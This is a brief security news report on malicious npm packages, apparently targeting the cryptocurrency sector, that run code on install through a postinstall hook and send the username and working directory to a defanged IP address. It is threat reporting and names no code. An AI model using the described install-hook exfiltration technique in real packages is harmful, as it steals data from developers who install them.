Cybersecurity researchers have discovered a new bunch of malicious packages on the npm package registry that are designed to exfiltrate sensitive developer information.
Software supply chain firm Phylum, which first identified the “test” packages on July 31, 2023, said they “demonstrated increasing functionality and refinement,” hours after which they were removed and re-uploaded under different, legitimate-sounding package names.
While the end goal of the undertaking is not clear, it’s suspected to be a highly targeted campaign aimed at the cryptocurrency sector based on references to modules such as “rocketrefer” and “binarium.”
“The index.js code is spawned in a child process by the preinstall.js file,” the Phylum researcher team said. “This action is prompted by the postinstall hook defined in the package.json file, which is executed upon package installation. Therefore, the mere act of installing this package initiates the execution of all this code.”
The first step entails gathering the current operating system username and the current working directory, following which a GET request with the collected data is sent to 185.62.57[.]60:8000/http. The exact motivation behind this action is currently unknown, although it’s believed that the information could be used to trigger “unseen server-side behaviors.”
images from Hacker News